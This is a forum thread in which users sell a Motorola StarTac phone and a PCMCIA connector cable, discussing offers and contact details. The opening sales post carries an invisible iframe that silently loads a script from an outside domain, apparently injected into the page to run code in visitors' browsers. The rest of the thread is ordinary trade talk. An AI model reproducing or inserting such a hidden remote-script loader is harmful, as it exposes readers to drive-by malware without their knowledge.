+ Reply to Thread

StarTac for sell.....

anyone interested in a Mot. StarTac Sprint Dual Band???? Has 2 batteries (extended life), desk top double charger, car charger, clip belt carrier (std), and a Coach leather case (brown - $69 new). Make me an offer if you're interested....<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    .....beam me up Scotty...

Cool

I would pay you $50 if you haven't sold it... Thanks!
    John Mc

Unhappy

Sorry, I meant to offer you $100. But for some reason, I keyed in $50... I must be subconsciously looking to steal it!! Again, I'm sorry, I hope I didn't insult you. That's why it's so important to review your post before you submit it!!

Anyway friend of mine is looking for a good deal on a Timeport, I told him about your post, and he asked me to make you an offer.

Hey John............... thanks for the offer. I'm gonna give it til Wed. to see if anyone else betters it.

Thumbs up

Originally posted by petewat
    Hey John............... thanks for the offer. I'm gonna give it til Wed. to see if anyone else betters it.
    Sure, Good luck! Let me know if you don't!

hey CB.............. it's yours if ya still want it. I emailed you with my email addy.

Looks like we may be giving "trekkies" a run for their money! Anyone interested in organizing a convention?
    Hey Steph- There was a discussion about doin just that in the "average age" poll thread. The quote is MJ's. Sounds like there is a lotta ppl from the midwest.

I just took out my post and started it's own thread called MEET & GREET. Thanks for your input.
    Si hoc Legere Scis Nimium Eruditionis habes.

I have a Sprint pcmcia card that has a cable that hooks up to a Star Tac to make it a modem. Used very little. Have software & manual. I even pay for the shipping. Works Macs and PC's. Any interest? eMail me, ceo@shh-chem.com

Administrator

Arrow

is this the air card? or just a pcmcia card wqith a connector for the star tac?

Marc,
    The product is used to connect a phone to a laptop using a PCMCIA port. It's just a cable that connect to a phone and has a PCMCIA card at the other end. No modem or aircard, just a connector.

homer

Originally posted by Marctronixx
    is this the air card? or just a pcmcia card wqith a connector for the star tac?
    Marc,

The product is used to connect a phone to a laptop using a PCMCIA port. It's just a cable that connect to a phone and has a PCMCIA card at the other end. No modem or aircard, just a connector.

homer

What Homer said. I will sell it real cheap. Say $25.00 and I will pay for shipping.:p

Administrator

Arrow

ok..
    i have the exact same phone with the wireless web connection kit, but i have the serial cable. AND i have the piggy back piece to store numbers, contacts, etc... i forget its name....

Sale

If you want the item email me: ceo@shh-chem.com

Administrator

Arrow

thanks for the offer, but of course i dont need it as i have the i300... now if i only knew you 3 years ago when i got the startac....